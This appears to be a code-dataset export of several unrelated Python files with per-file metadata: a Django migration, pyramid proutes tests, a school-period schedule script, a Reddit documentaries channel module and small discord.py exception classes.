                ('genre', models.CharField(choices=[('', "Select the author's genre"), ('M', 'Male'), ('F', 'Female'), ('X', 'Other')], max_length=1)),
                ('short_bio', models.CharField(blank=True, default='No biography has been set for this author', max_length=255)),
                # NOTE(review): 'Writter' is a typo kept from the original
                # migration (see _LANGUAGE_CHOICES note above).
                ('role', models.CharField(choices=[('Writter', 'Writter'), ('Director', 'Director')], max_length=8)),
            ],
        ),
        migrations.CreateModel(
            name='Book',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_at', models.DateField(auto_now_add=True)),
                ('title', models.CharField(max_length=32, unique=True)),
                ('description', models.CharField(blank=True, max_length=400)),
                ('phrase', models.CharField(blank=True, max_length=100)),
                ('release_year', models.SmallIntegerField(choices=_YEAR_CHOICES, verbose_name='Year')),
                ('art', models.CharField(editable=False, max_length=32)),
                ('language', models.CharField(blank=True, choices=_LANGUAGE_CHOICES, max_length=2, verbose_name='Original Language')),
                ('image', models.ImageField(blank=True, null=True, upload_to=items.models.b_img_directory_path)),
                ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='items.Author')),
            ],
            options={
                'ordering': ['title'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='Comment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('user', models.CharField(max_length=64)),
                ('content', models.CharField(max_length=1000)),
                ('commented_at', models.DateTimeField(auto_now_add=True)),
                ('grade', models.SmallIntegerField(choices=_GRADE_CHOICES, default=5)),
                ('book', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='comments', related_query_name='whose_comments', to='items.Book')),
            ],
            options={
                'ordering': ['-commented_at'],
            },
        ),
        migrations.CreateModel(
            name='Contact',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('first_name', models.CharField(max_length=31)),
                ('last_name', models.CharField(max_length=31)),
                ('organisation', models.CharField(max_length=31)),
                ('content', models.CharField(max_length=511)),
            ],
        ),
        migrations.CreateModel(
            name='Film',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_at', models.DateField(auto_now_add=True)),
                ('title', models.CharField(max_length=32, unique=True)),
                ('description', models.CharField(blank=True, max_length=400)),
                ('phrase', models.CharField(blank=True, max_length=100)),
                ('release_year', models.SmallIntegerField(choices=_YEAR_CHOICES, verbose_name='Year')),
                ('art', models.CharField(editable=False, max_length=32)),
                ('language', models.CharField(blank=True, choices=_LANGUAGE_CHOICES, max_length=2, verbose_name='Original Language')),
                ('image', models.ImageField(blank=True, null=True, upload_to=items.models.f_img_directory_path)),
                ('director', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='items.Author')),
            ],
            options={
                'ordering': ['title'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='Genre',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(help_text='Enter a genre', max_length=32, unique=True)),
            ],
        ),
        migrations.AddField(
            model_name='film',
            name='genres',
            field=models.ManyToManyField(help_text='Select the genres for this artpiece', related_name='films_related', related_query_name='whose_films', to='items.Genre'),
        ),
        migrations.AddField(
            model_name='comment',
            name='film',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='comments', related_query_name='whose_comments', to='items.Film'),
        ),
        migrations.AddField(
            model_name='book',
            name='genres',
            field=models.ManyToManyField(help_text='Select the genres for this artpiece', related_name='books_related', related_query_name='whose_books', to='items.Genre'),
        ),
    ]
| 112.061404
| 3,170
| 0.56955
| 1,577
| 12,775
| 4.54851
| 0.252378
| 0.046006
| 0.025094
| 0.033459
| 0.859752
| 0.836749
| 0.826432
| 0.826432
| 0.814443
| 0.814443
| 0
| 0.352815
| 0.199061
| 12,775
| 113
| 3,171
| 113.053097
| 0.348221
| 0.003523
| 0
| 0.556604
| 1
| 0
| 0.089959
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028302
| 0
| 0.066038
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
25a3cd2e397d3a4fa1405f0e90b2284ec1f6c787
| 6,351
|
py
|
Python
|
pyramid/tests/test_scripts/test_proutes.py
|
danielpronych/pyramid-doxygen
|
ad95a8c151c2c4e029e03aed2feda2993380f36f
|
[
"BSD-2-Clause"
] | null | null | null |
pyramid/tests/test_scripts/test_proutes.py
|
danielpronych/pyramid-doxygen
|
ad95a8c151c2c4e029e03aed2feda2993380f36f
|
[
"BSD-2-Clause"
] | null | null | null |
pyramid/tests/test_scripts/test_proutes.py
|
danielpronych/pyramid-doxygen
|
ad95a8c151c2c4e029e03aed2feda2993380f36f
|
[
"BSD-2-Clause"
] | null | null | null |
import unittest
from pyramid.tests.test_scripts import dummy
class TestPRoutesCommand(unittest.TestCase):
    """Unit tests for ``pyramid.scripts.proutes.PRoutesCommand``."""

    def _getTargetClass(self):
        """Return the class under test, imported lazily."""
        from pyramid.scripts.proutes import PRoutesCommand
        return PRoutesCommand

    def _makeOne(self):
        """Build a command wired to a dummy bootstrap and a fake ini path."""
        command = self._getTargetClass()([])
        command.bootstrap = (dummy.DummyBootstrap(),)
        command.args = ('/foo/bar/myapp.ini#myapp',)
        return command

    def test_good_args(self):
        command = self._getTargetClass()([])
        command.bootstrap = (dummy.DummyBootstrap(),)
        command.args = ('/foo/bar/myapp.ini#myapp', 'a=1')
        fake_mapper = dummy.DummyMapper(dummy.DummyRoute('a', '/a'))
        command._get_mapper = lambda *ignored: fake_mapper
        captured = []
        command.out = captured.append
        command.run()
        self.assertTrue('<unknown>' in ''.join(captured))

    def test_bad_args(self):
        command = self._getTargetClass()([])
        command.bootstrap = (dummy.DummyBootstrap(),)
        command.args = ('/foo/bar/myapp.ini#myapp', 'a')
        fake_mapper = dummy.DummyMapper(dummy.DummyRoute('a', '/a'))
        command._get_mapper = lambda *ignored: fake_mapper
        self.assertRaises(ValueError, command.run)

    def test_no_routes(self):
        command = self._makeOne()
        fake_mapper = dummy.DummyMapper()
        command._get_mapper = lambda *ignored: fake_mapper
        captured = []
        command.out = captured.append
        self.assertEqual(command.run(), 0)
        self.assertEqual(captured, [])

    def test_no_mapper(self):
        command = self._makeOne()
        command._get_mapper = lambda *ignored: None
        captured = []
        command.out = captured.append
        self.assertEqual(command.run(), 0)
        self.assertEqual(captured, [])

    def test_single_route_no_route_registered(self):
        command = self._makeOne()
        fake_mapper = dummy.DummyMapper(dummy.DummyRoute('a', '/a'))
        command._get_mapper = lambda *ignored: fake_mapper
        captured = []
        command.out = captured.append
        self.assertEqual(command.run(), 0)
        self.assertEqual(len(captured), 3)
        self.assertEqual(captured[-1].split(), ['a', '/a', '<unknown>'])

    def test_route_with_no_slash_prefix(self):
        # Pattern 'a' should still be printed with a leading slash.
        command = self._makeOne()
        fake_mapper = dummy.DummyMapper(dummy.DummyRoute('a', 'a'))
        command._get_mapper = lambda *ignored: fake_mapper
        captured = []
        command.out = captured.append
        self.assertEqual(command.run(), 0)
        self.assertEqual(len(captured), 3)
        self.assertEqual(captured[-1].split(), ['a', '/a', '<unknown>'])

    def test_single_route_no_views_registered(self):
        from zope.interface import Interface
        from pyramid.registry import Registry
        from pyramid.interfaces import IRouteRequest
        registry = Registry()

        def view(): pass

        class IMyRoute(Interface):
            pass

        registry.registerUtility(IMyRoute, IRouteRequest, name='a')
        command = self._makeOne()
        fake_mapper = dummy.DummyMapper(dummy.DummyRoute('a', '/a'))
        command._get_mapper = lambda *ignored: fake_mapper
        captured = []
        command.out = captured.append
        command.bootstrap = (dummy.DummyBootstrap(registry=registry),)
        self.assertEqual(command.run(), 0)
        self.assertEqual(len(captured), 3)
        self.assertEqual(captured[-1].split()[:3], ['a', '/a', 'None'])

    def test_single_route_one_view_registered(self):
        from zope.interface import Interface
        from pyramid.registry import Registry
        from pyramid.interfaces import IRouteRequest
        from pyramid.interfaces import IViewClassifier
        from pyramid.interfaces import IView
        registry = Registry()

        def view(): pass

        class IMyRoute(Interface):
            pass

        registry.registerAdapter(view,
                                 (IViewClassifier, IMyRoute, Interface),
                                 IView, '')
        registry.registerUtility(IMyRoute, IRouteRequest, name='a')
        command = self._makeOne()
        fake_mapper = dummy.DummyMapper(dummy.DummyRoute('a', '/a'))
        command._get_mapper = lambda *ignored: fake_mapper
        captured = []
        command.out = captured.append
        command.bootstrap = (dummy.DummyBootstrap(registry=registry),)
        self.assertEqual(command.run(), 0)
        self.assertEqual(len(captured), 3)
        self.assertEqual(captured[-1].split()[:3], ['a', '/a', '<function'])

    def test_single_route_one_view_registered_with_factory(self):
        from zope.interface import Interface
        from pyramid.registry import Registry
        from pyramid.interfaces import IRouteRequest
        from pyramid.interfaces import IViewClassifier
        from pyramid.interfaces import IView
        registry = Registry()

        def view(): pass

        class IMyRoot(Interface):
            pass

        class IMyRoute(Interface):
            pass

        registry.registerAdapter(view,
                                 (IViewClassifier, IMyRoute, IMyRoot),
                                 IView, '')
        registry.registerUtility(IMyRoute, IRouteRequest, name='a')
        command = self._makeOne()

        def factory(request): pass

        fake_mapper = dummy.DummyMapper(
            dummy.DummyRoute('a', '/a', factory=factory))
        command._get_mapper = lambda *ignored: fake_mapper
        captured = []
        command.out = captured.append
        command.bootstrap = (dummy.DummyBootstrap(registry=registry),)
        self.assertEqual(command.run(), 0)
        self.assertEqual(len(captured), 3)
        self.assertEqual(captured[-1].split()[:3], ['a', '/a', '<unknown>'])

    def test__get_mapper(self):
        from pyramid.registry import Registry
        from pyramid.urldispatch import RoutesMapper
        command = self._makeOne()
        self.assertEqual(command._get_mapper(Registry()).__class__,
                         RoutesMapper)
class Test_main(unittest.TestCase):
    """Tests for the module-level ``main`` entry point of proutes."""

    def _callFUT(self, argv):
        from pyramid.scripts.proutes import main
        return main(argv, quiet=True)

    def test_it(self):
        # With no config-file argument main() reports usage failure (2).
        self.assertEqual(self._callFUT(['proutes']), 2)
| 36.5
| 72
| 0.600063
| 674
| 6,351
| 5.532641
| 0.137982
| 0.084473
| 0.036203
| 0.043443
| 0.779297
| 0.73934
| 0.739072
| 0.711183
| 0.711183
| 0.711183
| 0
| 0.004814
| 0.280428
| 6,351
| 173
| 73
| 36.710983
| 0.81116
| 0
| 0
| 0.700637
| 0
| 0
| 0.026772
| 0.011339
| 0
| 0
| 0
| 0
| 0.146497
| 1
| 0.11465
| false
| 0.050955
| 0.121019
| 0
| 0.292994
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
25f0a32bd79bafc09891b19c1a08035f8d13f0e4
| 151
|
py
|
Python
|
basars_addons/schedules/__init__.py
|
Basars/basars-addons
|
0719216613ab7c6d23b26e55b09b9b024e1485ad
|
[
"MIT"
] | null | null | null |
basars_addons/schedules/__init__.py
|
Basars/basars-addons
|
0719216613ab7c6d23b26e55b09b9b024e1485ad
|
[
"MIT"
] | null | null | null |
basars_addons/schedules/__init__.py
|
Basars/basars-addons
|
0719216613ab7c6d23b26e55b09b9b024e1485ad
|
[
"MIT"
] | null | null | null |
from basars_addons.schedules.cosine_decay import InitialCosineDecayRestarts
from basars_addons.schedules.cosine_decay import CosineDecayWarmupRestarts
| 50.333333
| 75
| 0.92053
| 16
| 151
| 8.4375
| 0.5625
| 0.148148
| 0.237037
| 0.37037
| 0.622222
| 0.622222
| 0.622222
| 0
| 0
| 0
| 0
| 0
| 0.05298
| 151
| 2
| 76
| 75.5
| 0.944056
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d303c2dafa1f17c348ddee3c99adecf98990c23e
| 12,671
|
py
|
Python
|
schedule.py
|
budgidiere/Schedule
|
45e2777d9cb24c098a91a4ec83b31127264a1edc
|
[
"Apache-2.0"
] | null | null | null |
schedule.py
|
budgidiere/Schedule
|
45e2777d9cb24c098a91a4ec83b31127264a1edc
|
[
"Apache-2.0"
] | null | null | null |
schedule.py
|
budgidiere/Schedule
|
45e2777d9cb24c098a91a4ec83b31127264a1edc
|
[
"Apache-2.0"
] | null | null | null |
# schedule.py
import time

# Derive the current time of day from the fixed-width time.ctime() string,
# e.g. 'Mon Sep 16 11:42:07 2019'.
clock = time.ctime()
hour = clock[11:13]        # 'HH' as a string
minute = clock[14:16]      # 'MM' as a string
currenttime = int(hour) * 60 + int(minute)  # minutes since midnight
day = clock[0:3]           # three-letter day abbreviation, e.g. 'Mon'
print(currenttime)
print(clock)

# Current class label; updated later by getclass().
whatclass = ("none")
# Used to read the White and Gold week value.
def readwg():
    """Load the white/gold week flag from wgweekfile.txt into global `wg`.

    The file content is stored as-is (a string). Also returns the value
    read, so callers may use the return instead of the global.
    Uses a context manager so the file handle is closed even on error
    (the original left it open if read() raised).
    """
    global wg
    with open("wgweekfile.txt", "r") as flag_file:
        wg = flag_file.read()
    return wg
# Used to write the white and gold value.
def changewg(value):
    """Persist the white/gold week flag to wgweekfile.txt.

    `value` is stringified before writing, so ints and strings both work.
    Uses a context manager so the handle is closed even if write() raises.
    """
    print("ok")
    with open("wgweekfile.txt", "w") as flag_file:
        flag_file.write(str(value))

# BUG FIX: the original did `changewg = ("false")` here, rebinding the
# function name above to a string — every later changewg(...) call would
# raise TypeError. Renamed the flag variable so the function survives.
changewg_done = ("false")
# Checking if this is the first run.
def checkfirstrun():
    """Prompt for an initial white/gold value when the flag is still '3'.

    Reads the module global `wg`; '3' is treated as the sentinel meaning
    the flag file has never been set.
    """
    if str(wg) != str(3):
        return
    print("hi")
    new_value = input("Please set white and gold ")
    changewg(new_value)
# Used to determine the current class.
def getclass():
    """Set the module global `whatclass` from day, time and week flag.

    Reads module globals: `wg` (week flag as read from the flag file, a
    string), `day` (three-letter abbreviation from time.ctime()) and
    `currenttime` (minutes since midnight). On a weekday the label of the
    matching (start, end) slot is assigned; if no slot matches (before
    7:00, after 15:12, or in a gap) `whatclass` is left unchanged, as in
    the original. On other days the week flag is toggled via changewg().
    An unrecognised flag value resets `whatclass` to "none".

    BUG FIX: the original compared `str(wg) == (0)` / `(1)` — a string
    against an int, always False — so no schedule branch could ever run.
    The comparisons now use the string values "0" and "1".

    NOTE(review): the original's trailing `elif currenttime < 912.1:
    changewg(...)` is read here as belonging to the day chain (i.e. it
    fires on non-weekdays); the source indentation was lost, so confirm.
    """
    global whatclass

    # Each slot is (start, end, label); label applies when
    # start < currenttime < end (both strict, matching the original).
    # Monday runs the same bell schedule in both week variants.
    monday = [
        (420, 480, "Building Open"),
        (480, 508.8, "4th Period"),
        (508.9, 540, "Advisory"),
        (540, 569.4, "5th Period"),
        (569.5, 611.4, "Activites"),
        (611.5, 666, "6th Period"),
        (666.1, 684, "Lunch"),
        (684.1, 738.6, "7th Peorid"),
        (738.7, 793.2, "1st Peorid"),
        (793.3, 794.6, "Afternoon Break"),
        (794.7, 856.2, "2nd Peorid"),
        (856.3, 912, "3rd Peorid"),
    ]
    week0 = {
        "Mon": monday,
        "Tue": [
            (420, 480, "Building Open"),
            (480.1, 547.1, "1st Period"),
            (547.2, 553.2, "Advisory"),
            (553.3, 565.2, "Activities"),
            (565.3, 634.2, "2nd Period"),
            (634.2, 676.1, "Lunch"),
            (676.2, 745.2, "3rd Period"),
            (745.3, 814.2, "4th Period"),
            (814.3, 843.0, "Afternoon Break"),
            (843.1, 912.0, "5th Period"),
        ],
        "Wed": [
            (420, 540, "Building Open"),
            (540.1, 605.4, "6th Period"),
            (605.5, 611.4, "Advisory"),
            (611.5, 667.1, "X Period"),
            (667.2, 682.1, "Lunch"),
            (682.2, 749.4, "7th Period"),
            (749.5, 840.6, "1st Period"),
            (840.7, 845.4, "Afternoon Break"),
            (845.5, 912.0, "2nd Period"),
        ],
        "Thu": [
            (420, 480, "Bulding Open"),
            (480.1, 547.1, "3rd Period"),
            (547.2, 553.2, "Advisory"),
            (553.3, 565.2, "Activities"),
            (565.3, 634.2, "4th Period"),
            (634.2, 676.1, "Lunch"),
            (676.2, 745.2, "5th Period"),
            (745.3, 814.2, "6th Period"),
            (814.3, 843.0, "Afternoon Break"),
            (843.1, 912.0, "7th Period"),
        ],
        "Fri": [
            (420, 480, "Building Open"),
            (480, 508.8, "5th Period"),
            (508.9, 540, "Advisory"),
            (540, 569.4, "6th Period"),
            (569.5, 611.4, "Activites"),
            (611.5, 666, "7th Period"),
            (666.1, 684, "Lunch"),
            (684.1, 738.6, "1st Peorid"),
            (738.7, 793.2, "2nd Peorid"),
            (793.3, 794.6, "Afternoon Break"),
            (794.7, 856.2, "3rd Peorid"),
            (856.3, 912, "4th Peorid"),
        ],
    }
    week1 = {
        "Mon": monday,
        "Tue": [
            (420, 480, "Building Open"),
            (480.1, 547.1, "5th Period"),
            (547.2, 553.2, "Advisory"),
            (553.3, 565.2, "Activities"),
            (565.3, 634.2, "6th Period"),
            (634.2, 676.1, "Lunch"),
            (676.2, 745.2, "7th Period"),
            (745.3, 814.2, "1st Period"),
            (814.3, 843.0, "Afternoon Break"),
            (843.1, 912.0, "2nd Period"),
        ],
        "Wed": [
            (420, 540, "Building Open"),
            (540.1, 605.4, "3rd Period"),
            (605.5, 611.4, "Advisory"),
            (611.5, 667.1, "X Period"),
            (667.2, 682.1, "Lunch"),
            (682.2, 749.4, "4th Period"),
            (749.5, 840.6, "5th Period"),
            (840.7, 845.4, "Afternoon Break"),
            (845.5, 912.0, "6th Period"),
        ],
        "Thu": [
            (420, 480, "Bulding Open"),
            (480.1, 547.1, "7th Period"),
            (547.2, 553.2, "Advisory"),
            (553.3, 565.2, "Activities"),
            (565.3, 634.2, "1st Period"),
            (634.2, 676.1, "Lunch"),
            (676.2, 745.2, "2nd Period"),
            (745.3, 814.2, "3rd Period"),
            (814.3, 843.0, "Afternoon Break"),
            (843.1, 912.0, "4th Period"),
        ],
        "Fri": [
            (420, 480, "Building Open"),
            (480, 508.8, "2nd Period"),
            (508.9, 540, "Advisory"),
            (540, 569.4, "3rd Period"),
            (569.5, 611.4, "Activites"),
            (611.5, 666, "4th Period"),
            (666.1, 684, "Lunch"),
            (684.1, 738.6, "5th Peorid"),
            (738.7, 793.2, "6th Peorid"),
            (793.3, 794.6, "Afternoon Break"),
            (794.7, 856.2, "7th Peorid"),
            (856.3, 912, "1st Peorid"),
        ],
    }
    schedules = {"0": week0, "1": week1}

    week = str(wg)
    if week not in schedules:
        # Unknown flag value: mirror the original's final else branch.
        whatclass = ("none")
        return

    slots = schedules[week].get(day)
    if slots is None:
        # Not a Mon-Fri day: toggle the week flag (original's trailing
        # `elif currenttime < 912.1` branch).
        if currenttime < 912.1:
            changewg(1 if week == "0" else 0)
        return

    for start, end, label in slots:
        if start < currenttime < end:
            whatclass = label
            return
# Main part of the program: refresh the flag and the current class label
# once a minute, forever.
while True:
    readwg()          # re-read the white/gold week flag from disk
    checkfirstrun()   # prompt for an initial value on the very first run
    getclass()        # recompute the current class label
    print(whatclass)  # display it (to be replaced with real output later)
    time.sleep(60)    # throttle to one update per minute
| 45.253571
| 61
| 0.531529
| 1,310
| 12,671
| 5.138931
| 0.114504
| 0.22044
| 0.112299
| 0.038622
| 0.880719
| 0.870469
| 0.856209
| 0.856209
| 0.856209
| 0.839275
| 0
| 0.111028
| 0.369505
| 12,671
| 279
| 62
| 45.415771
| 0.731631
| 0.025807
| 0
| 0.847909
| 0
| 0
| 0.094323
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015209
| false
| 0
| 0.003802
| 0
| 0.019011
| 0.019011
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d32fadd4ff7f6437fb1ebe111930355e7c14cd81
| 5,058
|
py
|
Python
|
home/pi/blissflixx/chls/bfch_r_documentaries/__init__.py
|
erick-guerra/Royalbox
|
967dbbdddc94b9968e6eba873f0d20328fd86f66
|
[
"MIT"
] | 1
|
2022-01-29T11:17:58.000Z
|
2022-01-29T11:17:58.000Z
|
home/pi/blissflixx/chls/bfch_r_documentaries/__init__.py
|
erick-guerra/Royalbox
|
967dbbdddc94b9968e6eba873f0d20328fd86f66
|
[
"MIT"
] | null | null | null |
home/pi/blissflixx/chls/bfch_r_documentaries/__init__.py
|
erick-guerra/Royalbox
|
967dbbdddc94b9968e6eba873f0d20328fd86f66
|
[
"MIT"
] | null | null | null |
import chanutils.reddit
_SUBREDDIT = 'Documentaries'
_FEEDLIST = [
{'title':'Latest', 'url':'http://www.reddit.com/r/Documentaries.json'},
{'title':'Anthropology', 'url':'http://www.reddit.com/r/documentaries/search.json?q=flair%3A%27Anthropology%27&sort=top&restrict_sr=on&t=all'},
{'title':'Art', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Art%27&sort=top&restrict_sr=on&t=all'},
{'title':'Biography', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Biography%27&sort=top&restrict_sr=on&t=all'},
{'title':'Crime', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Crime%27&sort=top&restrict_sr=on&t=all'},
{'title':'Cusine', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Cuisine%27&sort=top&restrict_sr=on&t=all'},
{'title':'Disaster', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Disaster%27&sort=top&restrict_sr=on&t=all'},
{'title':'Drugs', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Drugs%27&sort=top&restrict_sr=on&t=all'},
{'title':'Economics', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Economics%27&sort=top&restrict_sr=on&t=all'},
{'title':'History', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27History%27&sort=top&restrict_sr=on&t=all'},
{'title':'History (Ancient)', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Ancient+hist%27&sort=top&restrict_sr=on&t=all'},
{'title':'History (20th Century)', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%2720th+century%27&sort=top&restrict_sr=on&t=all'},
{'title':'Intelligence', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Intelligence%27&sort=top&restrict_sr=on&t=all'},
{'title':'Literature', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Literature%27&sort=top&restrict_sr=on&t=all'},
{'title':'Medicine', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Medicine%27&sort=top&restrict_sr=on&t=all'},
{'title':'Music', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Music%27&sort=top&restrict_sr=on&t=all'},
{'title':'Nature', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Nature%27&sort=top&restrict_sr=on&t=all'},
{'title':'Offbeat', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Offbeat%27&sort=top&restrict_sr=on&t=all'},
{'title':'American Politics', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27American+politics%27&sort=top&restrict_sr=on&t=all'},
{'title':'International Politics', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Int+politics%27&sort=top&restrict_sr=on&t=all'},
{'title':'Psychology', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Psychology%27&sort=top&restrict_sr=on&t=all'},
{'title':'Religion', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Religion%27&sort=top&restrict_sr=on&t=all'},
{'title':'Science', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Science%27&sort=top&restrict_sr=on&t=all'},
{'title':'Sex', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Sex%27&sort=top&restrict_sr=on&t=all'},
{'title':'Sport', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Sport%27&sort=top&restrict_sr=on&t=all'},
{'title':'Tech/Internet', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Tech%27&sort=top&restrict_sr=on&t=all'},
{'title':'Travel', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Travel%27&sort=top&restrict_sr=on&t=all'},
{'title':'War', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27War%27&sort=top&restrict_sr=on&t=all'},
{'title':'World War 1', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27WW1%27&sort=top&restrict_sr=on&t=all'},
{'title':'World War 2', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27WW2%27&sort=top&restrict_sr=on&t=all'},
{'title':'Vietnam War', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Vietnam+conflict%27&sort=top&restrict_sr=on&t=all'},
{'title':'Afghanistan War', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Afghanistan+conflict%27&sort=top&restrict_sr=on&t=all'},
{'title':'Iraq War', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Iraq+conflict%27&sort=top&restrict_sr=on&t=all'},
]
def name():
    """Return the display name of this channel."""
    channel_name = 'Documentaries'
    return channel_name
def image():
    """Return the filename of the channel icon."""
    icon_file = "icon.png"
    return icon_file
def description():
    """Return the HTML description shown for this channel."""
    desc = "Assorted Documentaries Channel for /r/Documentaries subreddit (<a target='_blank' href='http://www.reddit.com/r/Documentaries'>http://www.reddit.com/r/Documentaries</a>)."
    return desc
def feedlist():
    """Return the channel's feed definitions (the module-level _FEEDLIST)."""
    feeds = _FEEDLIST
    return feeds
def feed(idx):
    """Fetch the feed at index ``idx`` via the reddit channel helper."""
    entry = _FEEDLIST[idx]
    return chanutils.reddit.get_feed(entry)
def search(q):
    """Search the channel's subreddit for query ``q`` via the reddit helper."""
    subreddit = _SUBREDDIT
    return chanutils.reddit.search(subreddit, q)
| 87.206897
| 181
| 0.723013
| 831
| 5,058
| 4.353791
| 0.135981
| 0.139303
| 0.12576
| 0.154782
| 0.769762
| 0.769762
| 0.753179
| 0.744057
| 0.744057
| 0.552515
| 0
| 0.034625
| 0.040728
| 5,058
| 57
| 182
| 88.736842
| 0.711047
| 0
| 0
| 0
| 0
| 0.673469
| 0.821669
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.122449
| false
| 0
| 0.020408
| 0.122449
| 0.265306
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
d3a2ec6e173d0fb72a68a3b63d9761d99c77b5bc
| 175
|
py
|
Python
|
src/misc/exceptions.py
|
KirtusJ/BirdBot
|
4440364caefa6ec9acf1bc7cf38605b1d90de20e
|
[
"MIT"
] | null | null | null |
src/misc/exceptions.py
|
KirtusJ/BirdBot
|
4440364caefa6ec9acf1bc7cf38605b1d90de20e
|
[
"MIT"
] | null | null | null |
src/misc/exceptions.py
|
KirtusJ/BirdBot
|
4440364caefa6ec9acf1bc7cf38605b1d90de20e
|
[
"MIT"
] | null | null | null |
from discord.ext import commands
class NotOwner(commands.CheckFailure):
    # Custom check-failure type; by its name it signals the invoking user is
    # not the bot owner — confirm at the command check that raises it.
    pass
class NotModerator(commands.CheckFailure):
    # Custom check-failure type; by its name it signals the invoking user is
    # not a moderator — confirm at the command check that raises it.
    pass
class Blacklisted(commands.CheckFailure):
    # Custom check-failure type; by its name it signals the invoking user is
    # blacklisted from the bot — confirm at the command check that raises it.
    pass
| 21.875
| 42
| 0.834286
| 20
| 175
| 7.3
| 0.55
| 0.410959
| 0.493151
| 0.39726
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091429
| 175
| 8
| 43
| 21.875
| 0.918239
| 0
| 0
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.428571
| 0.142857
| 0
| 0.571429
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
d3a81b924210e6b5f2ecf0bea93f3ef9cc255120
| 16,982
|
